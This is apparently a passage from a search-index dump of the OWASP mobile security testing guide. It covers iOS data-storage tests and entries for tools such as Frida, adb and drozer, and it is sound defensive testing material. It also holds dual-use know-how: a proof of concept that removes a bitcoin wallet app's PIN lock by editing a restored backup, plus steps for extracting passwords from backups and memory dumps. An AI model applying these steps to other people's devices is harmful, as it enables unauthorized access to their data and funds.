"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0054/","title":"Determining Whether Sensitive Data Is Shared with Third Parties","text":""},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0054/#overview","title":"Overview","text":"Sensitive information might be leaked to third parties by several means. On iOS typically via third-party services embedded in the app.
The features these services provide can involve tracking services to monitor the user's behavior while using the app, selling banner advertisements, or improving the user experience.
The downside is that developers don't usually know the details of the code executed via third-party libraries. Consequently, no more information than is necessary should be sent to a service, and no sensitive information should be disclosed.
Most third-party services are implemented in two ways:
To determine whether API calls and functions provided by the third-party library are used according to best practices, review their source code, requested permissions and check for any known vulnerabilities.
All data that's sent to third-party services should be anonymized to prevent exposure of PII (Personal Identifiable Information) that would allow the third party to identify the user account. No other data (such as IDs that can be mapped to a user account or session) should be sent to a third party.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0054/#dynamic-analysis","title":"Dynamic Analysis","text":"Check all requests to external services for embedded sensitive information. To intercept traffic between the client and server, you can perform dynamic analysis by launching a man-in-the-middle (MITM) attack with Burp Suite Professional or OWASP ZAP. Once you route the traffic through the interception proxy, you can try to sniff the traffic that passes between the app and server. All app requests that aren't sent directly to the server on which the main function is hosted should be checked for sensitive information, such as PII in a tracker or ad service.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0055/","title":"Finding Sensitive Data in the Keyboard Cache","text":""},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0055/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0055/#static-analysis","title":"Static Analysis","text":" textObject.autocorrectionType = UITextAutocorrectionTypeNo;\n textObject.secureTextEntry = YES;\n
Interface Builder
of Xcode and verify the states of Secure Text Entry
and Correction
in the Attributes Inspector
for the appropriate object.The application must prevent the caching of sensitive information entered into text fields. You can prevent caching by disabling it programmatically, using the textObject.autocorrectionType = UITextAutocorrectionTypeNo
directive in the desired UITextFields, UITextViews, and UISearchBars. For data that should be masked, such as PINs and passwords, set textObject.secureTextEntry
to YES
.
UITextField *textField = [ [ UITextField alloc ] initWithFrame: frame ];\ntextField.autocorrectionType = UITextAutocorrectionTypeNo;\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0055/#dynamic-analysis","title":"Dynamic Analysis","text":"If a jailbroken iPhone is available, execute the following steps:
Settings > General > Reset > Reset Keyboard Dictionary
..dat
in the following directory and its subdirectories (which might be different for iOS versions before 8.0): /private/var/mobile/Library/Keyboard/
UITextField *textField = [ [ UITextField alloc ] initWithFrame: frame ];\ntextField.autocorrectionType = UITextAutocorrectionTypeNo;\n
If you must use a non-jailbroken iPhone:
A backup of a device on which a mobile application has been installed will include all subdirectories (except for Library/Caches/
) and files in the app's private directory.
Therefore, avoid storing sensitive data in plaintext within any of the files or folders that are in the app's private directory or subdirectories.
Although all the files in Documents/
and Library/Application Support/
are always backed up by default, you can exclude files from the backup by calling NSURL setResourceValue:forKey:error:
with the NSURLIsExcludedFromBackupKey
key.
You can use the NSURLIsExcludedFromBackupKey and CFURLIsExcludedFromBackupKey file system properties to exclude files and directories from backups. An app that needs to exclude many files can do so by creating its own subdirectory and marking that directory excluded. Apps should create their own directories for exclusion instead of excluding system-defined directories.
Both file system properties are preferable to the deprecated approach of directly setting an extended attribute. All apps running on iOS version 5.1 and later should use these properties to exclude data from backups.
The following is sample Objective-C code for excluding a file from a backup on iOS 5.1 and later:
- (BOOL)addSkipBackupAttributeToItemAtPath:(NSString *) filePathString\n{\n NSURL* URL= [NSURL fileURLWithPath: filePathString];\n assert([[NSFileManager defaultManager] fileExistsAtPath: [URL path]]);\n\n NSError *error = nil;\n BOOL success = [URL setResourceValue: [NSNumber numberWithBool: YES]\n forKey: NSURLIsExcludedFromBackupKey error: &error];\n if(!success){\n NSLog(@\"Error excluding %@ from backup %@\", [URL lastPathComponent], error);\n }\n return success;\n}\n
The following is sample Swift code for excluding a file from a backup on iOS 5.1 and later, see Swift excluding files from iCloud backup for more information:
enum ExcludeFileError: Error {\n case fileDoesNotExist\n case error(String)\n}\n\nfunc excludeFileFromBackup(filePath: URL) -> Result<Bool, ExcludeFileError> {\n var file = filePath\n\n do {\n if FileManager.default.fileExists(atPath: file.path) {\n var res = URLResourceValues()\n res.isExcludedFromBackup = true\n try file.setResourceValues(res)\n return .success(true)\n\n } else {\n return .failure(.fileDoesNotExist)\n }\n } catch {\n return .failure(.error(\"Error excluding \\(file.lastPathComponent) from backup \\(error)\"))\n }\n}\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0058/#dynamic-analysis","title":"Dynamic Analysis","text":"In order to test the backup, you obviously need to create one first. The most common way to create a backup of an iOS device is by using iTunes, which is available for Windows, Linux and of course macOS (until macOS Mojave). When creating a backup via iTunes you can only back up the whole device and not select just a single app. Make sure that the option \"Encrypt local backup\" in iTunes is not set, so that the backup is stored in cleartext on your hard drive.
iTunes is no longer available from macOS Catalina onwards. Management of an iOS device, including updates, backup and restore, has been moved to the Finder app. The approach remains the same, as described above.
After the iOS device has been backed up, you need to retrieve the file path of the backup, which is stored in a different location on each OS. The official Apple documentation will help you to locate backups of your iPhone, iPad, and iPod touch.
When you want to navigate to the backup folder up to High Sierra you can easily do so. Starting with macOS Mojave you will get the following error (even as root):
$ pwd\n/Users/foo/Library/Application Support\n$ ls -alh MobileSync\nls: MobileSync: Operation not permitted\n
This is not a permission issue of the backup folder, but a new feature in macOS Mojave. You can solve this problem by granting full disk access to your terminal application by following the explanation on OSXDaily.
Before you can access the directory you need to select the folder with the UDID of your device. Check the section \"Getting the UDID of an iOS device\" in the \"iOS Basic Security Testing\" chapter on how to retrieve the UDID.
Once you know the UDID you can navigate into this directory and you will find the full backup of the whole device, which does include pictures, app data and whatever might have been stored on the device.
Review the data that's in the backed up files and folders. The structure of the directories and file names is obfuscated and will look like this:
$ pwd\n/Users/foo/Library/Application Support/MobileSync/Backup/416f01bd160932d2bf2f95f1f142bc29b1c62dcb/00\n$ ls | head -n 3\n000127b08898088a8a169b4f63b363a3adcf389b\n0001fe89d0d03708d414b36bc6f706f567b08d66\n000200a644d7d2c56eec5b89c1921dacbec83c3e\n
Therefore, it's not straightforward to navigate through it and you will not find any hints of the app you want to analyze in the directory or file name. You can consider using the iMazing shareware utility to assist here. Perform a device backup with iMazing and use its built-in backup explorer to easily analyze app container contents including original paths and file names.
Without iMazing or similar software you may need to resort to using grep to identify sensitive data. This is not the most thorough approach but you can try searching for sensitive data that you have keyed in while using the app before you made the backup. For example: the username, password, credit card data, PII or any data that is considered sensitive in the context of the app.
cd \"$HOME/Library/Application Support/MobileSync/Backup/<UDID>\"\ngrep -iRn \"password\" .\n
As described in the Static Analysis section, any sensitive data that you're able to find should be excluded from the backup, encrypted properly by using the Keychain or not stored on the device in the first place.
To identify if a backup is encrypted, you can check the key named \"IsEncrypted\" from the file \"Manifest.plist\", located at the root of the backup directory. The following example shows a configuration indicating that the backup is encrypted:
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n...\n <key>Date</key>\n <date>2021-03-12T17:43:33Z</date>\n <key>IsEncrypted</key>\n <true/>\n...\n</plist>\n
In case you need to work with an encrypted backup, there are some Python scripts in DinoSec's GitHub repo, such as backup_tool.py and backup_passwd.py, that will serve as a good starting point. However, note that they might not work with the latest iTunes/Finder versions and might need to be tweaked.
You can also use the tool iOSbackup to easily read and extract files from a password-encrypted iOS backup.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0058/#proof-of-concept-removing-ui-lock-with-tampered-backup","title":"Proof of Concept: Removing UI Lock with Tampered Backup","text":"As discussed earlier, sensitive data is not limited to just user data and PII. It can also be configuration or settings files that affect app behavior, restrict functionality, or enable security controls. If you take a look at the open source bitcoin wallet app, Bither, you'll see that it's possible to configure a PIN to lock the UI. And after a few easy steps, you will see how to bypass this UI lock with a modified backup on a non-jailbroken device.
After you enable the pin, use iMazing to perform a device backup:
Next you can open the backup to view app container files within your target app:
At this point you can view all the backed up content for Bither.
This is where you can begin parsing through the files looking for sensitive data. In the screenshot you'll see the net.bither.plist
file which contains the pin_code
attribute. To remove the UI lock restriction, simply delete the pin_code
attribute and save the changes.
From there it's possible to easily restore the modified version of net.bither.plist
back onto the device using the licensed version of iMazing.
The free workaround, however, is to find the plist file in the obfuscated backup generated by iTunes/Finder. So create your backup of the device with Bither's PIN code configured. Then, using the steps described earlier, find the backup directory and grep for \"pin_code\" as shown below.
$ cd \"$HOME/Library/Application Support/MobileSync/Backup/<UDID>\"\n$ grep -iRn \"pin_code\" .\nBinary file ./13/135416dd5f251f9251e0f07206277586b7eac6f6 matches\n
You'll see there was a match on a binary file with an obfuscated name. This is your net.bither.plist
file. Go ahead and rename the file giving it a plist extension so Xcode can easily open it up for you.
Again, remove the pin_code
attribute from the plist and save your changes. Rename the file back to the original name (i.e., without the plist extension) and perform your backup restore. When the restore is complete you'll see that Bither no longer prompts you for the PIN code when launched.
When performing static analysis for sensitive data exposed via memory, you should
String
and NSString
,There are several approaches and tools available for dynamically testing the memory of an iOS app for sensitive data.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0060/#retrieving-and-analyzing-a-memory-dump","title":"Retrieving and Analyzing a Memory Dump","text":"Whether you are using a jailbroken or a non-jailbroken device, you can dump the app's process memory with objection and Fridump. You can find a detailed explanation of this process in the section \"Memory Dump\", in the chapter \"Tampering and Reverse Engineering on iOS\".
After the memory has been dumped (e.g. to a file called \"memory\"), depending on the nature of the data you're looking for, you'll need a set of different tools to process and analyze that memory dump. For instance, if you're focusing on strings, it might be sufficient for you to execute the command strings
or rabin2 -zz
to extract those strings.
# using strings\n$ strings memory > strings.txt\n\n# using rabin2\n$ rabin2 -zz memory > strings.txt\n
Open strings.txt
in your favorite editor and dig through it to identify sensitive information.
However if you'd like to inspect other kind of data, you'd rather want to use radare2 and its search capabilities. See radare2's help on the search command (/?
) for more information and a list of options. The following shows only a subset of them:
$ r2 <name_of_your_dump_file>\n\n[0x00000000]> /?\nUsage: /[!bf] [arg] Search stuff (see 'e??search' for options)\n|Use io.va for searching in non virtual addressing spaces\n| / foo\\x00 search for string 'foo\\0'\n| /c[ar] search for crypto materials\n| /e /E.F/i match regular expression\n| /i foo search for string 'foo' ignoring case\n| /m[?][ebm] magicfile search for magic, filesystems or binary headers\n| /v[1248] value look for an `cfg.bigendian` 32bit value\n| /w foo search for wide string 'f\\0o\\0o\\0'\n| /x ff0033 search for hex string\n| /z min max search for strings of given size\n...\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0060/#runtime-memory-analysis","title":"Runtime Memory Analysis","text":"By using r2frida you can analyze and inspect the app's memory while running and without needing to dump it. For example, you may run the previous search commands from r2frida and search the memory for a string, hexadecimal values, etc. When doing so, remember to prepend the search command (and any other r2frida specific commands) with a backslash :
after starting the session with r2 frida://usb//<name_of_your_app>
.
For more information, options and approaches, please refer to section \"In-Memory Search\" in the chapter \"Tampering and Reverse Engineering on iOS\".
"},{"location":"MASTG/tools/","title":"Testing Tools","text":"The OWASP MASTG includes many tools to assist you in executing test cases, allowing you to perform static analysis, dynamic analysis, dynamic instrumentation, etc. These tools are meant to help you conduct your own assessments, rather than provide a conclusive result on an application's security status. It's essential to carefully review the tools' output, as it can contain both false positives and false negatives.
The goal of the MASTG is to be as accessible as possible. For this reason, we prioritize including tools that meet the following criteria:
In instances where no suitable open-source alternative exists, we may include closed-source tools. However, any closed-source tools included must be free to use, as we aim to avoid featuring paid tools whenever possible. This also extends to freeware or community editions of commercial tools.
Our goal is to be vendor-neutral and to serve as a trusted learning resource, so the specific category of \"automated mobile application security scanners\" presents a unique challenge. For this reason, we have historically avoided including such tools due to the competitive disadvantages they can create among vendors. In contrast, we prioritize tools like MobSF that provide full access to their code and a comprehensive set of tests, making them excellent for educational purposes. Tools that lack this level of transparency, even if they offer a free version, generally do not meet the inclusion criteria of the OWASP MAS project.
Disclaimer: Each tool included in the MASTG examples was verified to be functional at the time it was added. However, the tools may not work properly depending on the OS version of both your host computer and your test device. The functionality of the tools can also be affected by whether you're using a rooted or jailbroken device, the specific version of the rooting or jailbreaking method, and/or the tool version itself. The OWASP MASTG does not assume any responsibility for the operational status of these tools. If you encounter a broken tool or example, we recommend searching online for a solution or contacting the tool's provider directly. If the tool has a GitHub page, you may also open an issue there.
"},{"location":"MASTG/tools/#generic-tools","title":"Generic Tools","text":"ID Name Platform MASTG-TOOL-0037 RMS Runtime Mobile Security generic MASTG-TOOL-0031 Frida generic MASTG-TOOL-0035 MobSF generic MASTG-TOOL-0032 Frida CodeShare generic MASTG-TOOL-0033 Ghidra generic MASTG-TOOL-0036 r2frida generic MASTG-TOOL-0038 objection generic MASTG-TOOL-0034 LIEF generic MASTG-TOOL-0098 iaito generic"},{"location":"MASTG/tools/#android-tools","title":"Android Tools","text":"ID Name Platform MASTG-TOOL-0023 RootCloak Plus android MASTG-TOOL-0015 Drozer android MASTG-TOOL-0003 nm - Android android MASTG-TOOL-0004 adb android MASTG-TOOL-0009 APKiD android MASTG-TOOL-0024 Scrcpy android MASTG-TOOL-0029 objection for Android android MASTG-TOOL-0006 Android SDK android MASTG-TOOL-0025 SSLUnpinning android MASTG-TOOL-0018 jadx android MASTG-TOOL-0007 Android Studio android MASTG-TOOL-0019 jdb android MASTG-TOOL-0099 FlowDroid android MASTG-TOOL-0028 radare2 for Android android MASTG-TOOL-0001 Frida for Android android MASTG-TOOL-0014 Bytecode Viewer android MASTG-TOOL-0008 Android-SSL-TrustKiller android MASTG-TOOL-0021 Magisk android MASTG-TOOL-0010 APKLab android MASTG-TOOL-0011 Apktool android MASTG-TOOL-0017 House android MASTG-TOOL-0026 Termux android MASTG-TOOL-0002 MobSF for Android android MASTG-TOOL-0030 Angr android MASTG-TOOL-0027 Xposed android MASTG-TOOL-0013 Busybox android MASTG-TOOL-0016 gplaycli android MASTG-TOOL-0022 Proguard android MASTG-TOOL-0020 JustTrustMe android MASTG-TOOL-0012 apkx android MASTG-TOOL-0005 Android NDK android"},{"location":"MASTG/tools/#ios-tools","title":"Ios Tools","text":"ID Name Platform MASTG-TOOL-0053 iOSbackup ios MASTG-TOOL-0040 MobSF for iOS ios MASTG-TOOL-0074 objection for iOS ios MASTG-TOOL-0072 xcrun ios MASTG-TOOL-0069 Usbmuxd ios MASTG-TOOL-0057 lldb ios MASTG-TOOL-0071 Xcode Command Line Tools ios MASTG-TOOL-0066 SSL Kill Switch 3 ios MASTG-TOOL-0051 gdb ios MASTG-TOOL-0050 Frida-ios-dump ios MASTG-TOOL-0060 otool 
ios MASTG-TOOL-0041 nm - iOS ios MASTG-TOOL-0046 Cycript ios MASTG-TOOL-0065 simctl ios MASTG-TOOL-0068 SwiftShield ios MASTG-TOOL-0039 Frida for iOS ios MASTG-TOOL-0044 class-dump-z ios MASTG-TOOL-0055 iProxy ios MASTG-TOOL-0048 dsdump ios MASTG-TOOL-0059 optool ios MASTG-TOOL-0056 Keychain-Dumper ios MASTG-TOOL-0042 BinaryCookieReader ios MASTG-TOOL-0047 Cydia ios MASTG-TOOL-0101 codesign ios MASTG-TOOL-0062 Plutil ios MASTG-TOOL-0073 radare2 for iOS ios MASTG-TOOL-0049 Frida-cycript ios MASTG-TOOL-0061 Grapefruit ios MASTG-TOOL-0064 Sileo ios MASTG-TOOL-0067 swift-demangle ios MASTG-TOOL-0045 class-dump-dyld ios MASTG-TOOL-0058 MachoOView ios MASTG-TOOL-0063 security ios MASTG-TOOL-0054 ios-deploy ios MASTG-TOOL-0070 Xcode ios MASTG-TOOL-0043 class-dump ios"},{"location":"MASTG/tools/#network-tools","title":"Network Tools","text":"ID Name Platform MASTG-TOOL-0075 Android tcpdump network MASTG-TOOL-0078 MITM Relay network MASTG-TOOL-0076 bettercap network MASTG-TOOL-0097 mitmproxy network MASTG-TOOL-0081 Wireshark network MASTG-TOOL-0079 OWASP ZAP network MASTG-TOOL-0080 tcpdump network MASTG-TOOL-0077 Burp Suite network"},{"location":"MASTG/tools/android/MASTG-TOOL-0001/","title":"Frida for Android","text":"Frida supports interaction with the Android Java runtime though the Java API. You'll be able to hook and call both Java and native functions inside the process and its native libraries. Your JavaScript snippets have full access to memory, e.g. to read and/or write any structured data.
Here are some tasks that Frida APIs offers and are relevant or exclusive on Android:
Remember that on Android, you can also benefit from the built-in tools provided when installing Frida, that includes the Frida CLI (frida
), frida-ps
, frida-ls-devices
and frida-trace
, to name some of them.
Frida is often compared to Xposed, however this comparison is far from fair as both frameworks were designed with different goals in mind. This is important to understand as an app security tester so that you can know which framework to use in which situation:
Note that Xposed, as of early 2019, does not work on Android 9 (API level 28) yet.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0001/#installing-frida-on-android","title":"Installing Frida on Android","text":"In order to set up Frida on your Android device:
We assume a rooted device here unless otherwise noted. Download the frida-server binary from the Frida releases page. Make sure that you download the right frida-server binary for the architecture of your Android device or emulator: x86, x86_64, arm or arm64. Make sure that the server version (at least the major version number) matches the version of your local Frida installation. PyPI usually installs the latest version of Frida. If you're unsure which version is installed, you can check with the Frida command line tool:
frida --version\n
Or you can run the following command to automatically detect Frida version and download the right frida-server binary:
wget https://github.com/frida/frida/releases/download/$(frida --version)/frida-server-$(frida --version)-android-arm.xz\n
Copy frida-server to the device and run it:
adb push frida-server /data/local/tmp/\nadb shell \"chmod 755 /data/local/tmp/frida-server\"\nadb shell \"su -c /data/local/tmp/frida-server &\"\n
"},{"location":"MASTG/tools/android/MASTG-TOOL-0001/#using-frida-on-android","title":"Using Frida on Android","text":"With frida-server running, you should now be able to get a list of running processes with the following command (use the -U
option to indicate Frida to use a connected USB devices or emulator):
$ frida-ps -U\n PID Name\n----- --------------------------------------------------------------\n 276 adbd\n 956 android.process.media\n 198 bridgemgrd\n30692 com.android.chrome\n30774 com.android.chrome:privileged_process0\n30747 com.android.chrome:sandboxed\n30834 com.android.chrome:sandboxed\n 3059 com.android.nfc\n 1526 com.android.phone\n17104 com.android.settings\n 1302 com.android.systemui\n(...)\n
Or restrict the list with the -Uai
flag combination to get all apps (-a
) currently installed (-i
) on the connected USB device (-U
):
$ frida-ps -Uai\n PID Name Identifier\n----- ---------------------------------------- ------------------------------\n 766 Android System android\n30692 Chrome com.android.chrome\n 3520 Contacts Storage com.android.providers.contacts\n - Uncrackable1 sg.vantagepoint.uncrackable1\n - drozer Agent com.mwr.dz\n
This will show the names and identifiers of all apps, if they are currently running it will also show their PIDs. Search for your app in the list and take a note of the PID or its name/identifier. From now on you'll refer to your app by using one of them. A recommendation is to use the identifiers, as the PIDs will change on each run of the app. For example let's take com.android.chrome
. You can use this string now on all Frida tools, e.g. on the Frida CLI, on frida-trace or from a Python script.
To trace specific (low-level) library calls, you can use the frida-trace
command line tool:
frida-trace -U com.android.chrome -i \"open\"\n
This generates a little JavaScript in __handlers__/libc.so/open.js
, which Frida injects into the process. The script traces all calls to the open
function in libc.so
. You can modify the generated script according to your needs with Frida JavaScript API.
Unfortunately tracing high-level methods of Java classes is not yet supported (but might be in the future).
"},{"location":"MASTG/tools/android/MASTG-TOOL-0001/#frida-cli-and-the-java-api","title":"Frida CLI and the Java API","text":"Use the Frida CLI tool (frida
) to work with Frida interactively. It hooks into a process and gives you a command line interface to Frida's API.
frida -U com.android.chrome\n
With the -l
option, you can also use the Frida CLI to load scripts , e.g., to load myscript.js
:
frida -U -l myscript.js com.android.chrome\n
Frida also provides a Java API, which is especially helpful for dealing with Android apps. It lets you work with Java classes and objects directly. Here is a script to overwrite the onResume
function of an Activity class:
Java.perform(function () {\n var Activity = Java.use(\"android.app.Activity\");\n Activity.onResume.implementation = function () {\n console.log(\"[*] onResume() got called!\");\n this.onResume();\n };\n});\n
The above script calls Java.perform
to make sure that your code gets executed in the context of the Java VM. It instantiates a wrapper for the android.app.Activity
class via Java.use
and overwrites the onResume
function. The new onResume
function implementation prints a notice to the console and calls the original onResume
method by invoking this.onResume
every time an activity is resumed in the app.
The JADX decompiler (v1.3.3 and above) can generate Frida snippets through its graphical code browser. To use this feature, open the APK or DEX with jadx-gui
, browse to the target method, right click the method name, and select \"Copy as frida snippet (f)\". For example using the MASTG UnCrackable App for Android Level 1:
The above steps place the following output in the pasteboard, which you can then paste in a JavaScript file and feed into frida -U -l
.
let a = Java.use(\"sg.vantagepoint.a.a\");\na[\"a\"].implementation = function (bArr, bArr2) {\n console.log('a is called' + ', ' + 'bArr: ' + bArr + ', ' + 'bArr2: ' + bArr2);\n let ret = this.a(bArr, bArr2);\n console.log('a ret value is ' + ret);\n return ret;\n};\n
The above code hooks the a
method within the sg.vantagepoint.a.a
class and logs its input parameters and return values.
Frida also lets you search for and work with instantiated objects that are on the heap. The following script searches for instances of android.view.View
objects and calls their toString
method. The result is printed to the console:
setImmediate(function() {\n console.log(\"[*] Starting script\");\n Java.perform(function () {\n Java.choose(\"android.view.View\", {\n \"onMatch\":function(instance){\n console.log(\"[*] Instance found: \" + instance.toString());\n },\n \"onComplete\":function() {\n console.log(\"[*] Finished heap search\")\n }\n });\n });\n});\n
The output would look like this:
[*] Starting script\n[*] Instance found: android.view.View{7ccea78 G.ED..... ......ID 0,0-0,0 #7f0c01fc app:id/action_bar_black_background}\n[*] Instance found: android.view.View{2809551 V.ED..... ........ 0,1731-0,1731 #7f0c01ff app:id/menu_anchor_stub}\n[*] Instance found: android.view.View{be471b6 G.ED..... ......I. 0,0-0,0 #7f0c01f5 app:id/location_bar_verbose_status_separator}\n[*] Instance found: android.view.View{3ae0eb7 V.ED..... ........ 0,0-1080,63 #102002f android:id/statusBarBackground}\n[*] Finished heap search\n
You can also use Java's reflection capabilities. To list the public methods of the android.view.View
class, you could create a wrapper for this class in Frida and call getMethods
from the wrapper's class
property:
Java.perform(function () {\n var view = Java.use(\"android.view.View\");\n var methods = view.class.getMethods();\n for(var i = 0; i < methods.length; i++) {\n console.log(methods[i].toString());\n }\n});\n
This will print a very long list of methods to the terminal:
public boolean android.view.View.canResolveLayoutDirection()\npublic boolean android.view.View.canResolveTextAlignment()\npublic boolean android.view.View.canResolveTextDirection()\npublic boolean android.view.View.canScrollHorizontally(int)\npublic boolean android.view.View.canScrollVertically(int)\npublic final void android.view.View.cancelDragAndDrop()\npublic void android.view.View.cancelLongPress()\npublic final void android.view.View.cancelPendingInputEvents()\n...\n
"},{"location":"MASTG/tools/android/MASTG-TOOL-0002/","title":"MobSF for Android","text":"After MobSF is done with its analysis, you will receive a one-page overview of all the tests that were executed. The page is split up into multiple sections giving some first hints on the attack surface of the application.
The following is displayed:
AndroidManifest.xml
file.Refer to MobSF documentation for more details.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0003/","title":"nm - Android","text":"nm is a tool that displays the name list (symbol table) of the given binary. You can find here more information for the Android (GNU) version.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0004/","title":"adb","text":"adb (Android Debug Bridge), shipped with the Android SDK, bridges the gap between your local development environment and a connected Android device. You'll usually leverage it to test apps on the emulator or a connected device via USB or Wi-Fi. Use the adb devices
command to list the connected devices and execute it with the -l
argument to retrieve more details on them.
$ adb devices -l\nList of devices attached\n090c285c0b97f748 device usb:1-1 product:razor model:Nexus_7 device:flo\nemulator-5554 device product:sdk_google_phone_x86 model:Android_SDK_built_for_x86 device:generic_x86 transport_id:1\n
adb provides other useful commands such as adb shell
to start an interactive shell on a target and adb forward
to forward traffic on a specific host port to a different port on a connect device.
adb forward tcp:<host port> tcp:<device port>\n
$ adb -s emulator-5554 shell\nroot@generic_x86:/ # ls\nacct\ncache\ncharger\nconfig\n...\n
You'll come across different use cases on how you can use adb commands when testing later in this book. Note that you must define the serialnummer of the target device with the -s
argument (as shown by the previous code snippet) in case you have multiple devices connected.
The Android NDK contains prebuilt versions of the native compiler and toolchain. Both the GCC and Clang compilers have traditionally been supported, but active support for GCC ended with NDK revision 14. The device architecture and host OS determine the appropriate version. The prebuilt toolchains are in the toolchains
directory of the NDK, which contains one subdirectory for each architecture.
Besides picking the right architecture, you need to specify the correct sysroot for the native API level you want to target. The sysroot is a directory that contains the system headers and libraries for your target. Native APIs vary by Android API level. Available sysroot directories for each Android API level can be found in $NDK/platforms/
. Each API level directory contains subdirectories for the various CPUs and architectures.
One possibility for setting up the build system is exporting the compiler path and necessary flags as environment variables. To make things easier, however, the NDK allows you to create a so-called standalone toolchain, which is a temporary toolchain that incorporates the required settings.
To set up a standalone toolchain, download the latest stable version of the NDK. Extract the ZIP file, change into the NDK root directory, and run the following command:
./build/tools/make_standalone_toolchain.py --arch arm --api 24 --install-dir /tmp/android-7-toolchain\n
This creates a standalone toolchain for Android 7.0 (API level 24) in the directory /tmp/android-7-toolchain
. For convenience, you can export an environment variable that points to your toolchain directory, (we'll be using this in the examples). Run the following command or add it to your .bash_profile
or other startup script:
export TOOLCHAIN=/tmp/android-7-toolchain\n
"},{"location":"MASTG/tools/android/MASTG-TOOL-0006/","title":"Android SDK","text":"Local Android SDK installations are managed via Android Studio. Create an empty project in Android Studio and select Tools -> SDK Manager to open the SDK Manager GUI. The SDK Platforms tab is where you install SDKs for multiple API levels. Recent API levels are:
An overview of all Android codenames, their version number and API levels can be found in the Android Developer Documentation.
Installed SDKs are on the following paths:
Windows:
C:\\Users\\<username>\\AppData\\Local\\Android\\sdk\n
MacOS:
/Users/<username>/Library/Android/sdk\n
Note: On Linux, you need to choose an SDK directory. /opt
, /srv
, and /usr/local
are common choices.
The official IDE for Google's Android operating system, built on JetBrains' IntelliJ IDEA software and designed specifically for Android development - https://developer.android.com/studio/index.html
"},{"location":"MASTG/tools/android/MASTG-TOOL-0008/","title":"Android-SSL-TrustKiller","text":"Android-SSL-TrustKiller is a Cydia Substrate Module acting as a blackbox tool to bypass SSL certificate pinning for most applications running on a device - https://github.com/iSECPartners/Android-SSL-TrustKiller
"},{"location":"MASTG/tools/android/MASTG-TOOL-0009/","title":"APKiD","text":"APKiD gives you information about how an APK was made. It identifies many compilers, packers, obfuscators, and other weird stuff.
For more information on what this tool can be used for, check out:
APKLab is a convenient Visual Studio Code extension leveraging tools such as apktool and jadx to enable features including app unpacking, decompilation, code patching (e.g. for MITM), and repackaging straight from the IDE.
For more information, you can refer to APKLab's official documentation.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0011/","title":"Apktool","text":"Apktool is used to unpack Android app packages (APKs). Simply unzipping APKs with the standard unzip
utility leaves some files unreadable. AndroidManifest.xml
is encoded into binary XML format which isn\u2019t readable with a text editor. Also, the app resources are still packaged into a single archive file.
When run with default command line flags, apktool automatically decodes the Android Manifest file to text-based XML format and extracts the file resources (it also disassembles the .DEX files to smali code - a feature that we\u2019ll revisit later in this book).
Among the unpacked files you can usually find (after running apktool d base.apk
):
You can also use apktool to repackage decoded resources back to binary APK/JAR. See the section \"Exploring the App Package\" later on this chapter and section \"Repackaging\" in the chapter Tampering and Reverse Engineering on Android for more information and practical examples.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0012/","title":"apkx","text":"apkx is a Python wrapper to popular free DEX converters and Java decompilers. It automates the extraction, conversion, and decompilation of APKs. Install it as follows:
git clone https://github.com/muellerberndt/apkx\ncd apkx\nsudo ./install.sh\n
This should copy apkx to /usr/local/bin
. See section \"Decompiling Java Code\" of the \"Reverse Engineering and Tampering\" chapter for more information about usage.
Busybox combines multiple common Unix utilities into a small single executable. The utilities included generally have fewer options than their full-featured GNU counterparts, but are sufficient to provide a complete environment on a small or embedded system. Busybox can be installed on a rooted device by downloading the Busybox application from Google Play Store. You can also download the binary directly from the Busybox website. Once downloaded, make an adb push busybox /data/local/tmp
to have the executable available on your phone. A quick overview of how to install and use Busybox can be found in the Busybox FAQ.
Bytecode Viewer (BCV) is a free and open source Java decompiler framework running on all operating systems. It is a versatile tool which can be used to decompile Android apps, view APK resources (via apktool) and easily edit APKs (via Smali/Baksmali). Apart from APKs, also DEX, Java Class files and Java Jars can be viewed. One of its major features is the support for multiple Java bytecode decompilers under one GUI. BCV currently includes the Procyon, CFR, Fernflower, Krakatau, and JADX-Core decompilers. These decompilers have different strengths and can be easily leveraged while using BCV, especially when dealing with obfuscated programs.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0015/","title":"Drozer","text":"Drozer is an Android security assessment framework that allows you to search for security vulnerabilities in apps and devices by assuming the role of a third-party app interacting with the other application's IPC endpoints and the underlying OS.
The advantage of using drozer lies in its ability to automate several tasks and in the fact that it can be expanded through modules. The modules are very helpful and they cover different categories including a scanner category that allows you to scan for known defects with a simple command such as the module scanner.provider.injection
which detects SQL injections in content providers in all the apps installed in the system. Without drozer, simple tasks such as listing the app's permissions require several steps that include decompiling the APK and manually analyzing the results.
You can refer to drozer GitHub page (for Linux and Windows, for macOS please refer to this blog post) and the drozer website for prerequisites and installation instructions.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0015/#using-drozer","title":"Using Drozer","text":"Before you can start using drozer, you'll also need the drozer agent that runs on the Android device itself. Download the latest drozer agent from the GitHub releases page and install it with adb install drozer.apk
.
Once the setup is completed you can start a session to an emulator or a device connected per USB by running adb forward tcp:31415 tcp:31415
and drozer console connect
. This is called direct mode and you can see the full instructions in the User Guide in section \"Starting a Session\". An alternative is to run Drozer in infrastructure mode, where, you are running a drozer server that can handle multiple consoles and agents, and routes sessions between them. You can find the details of how to setup drozer in this mode in the \"Infrastructure Mode\" section of the User Guide.
Now you are ready to begin analyzing apps. A good first step is to enumerate the attack surface of an app which can be done easily with the following command:
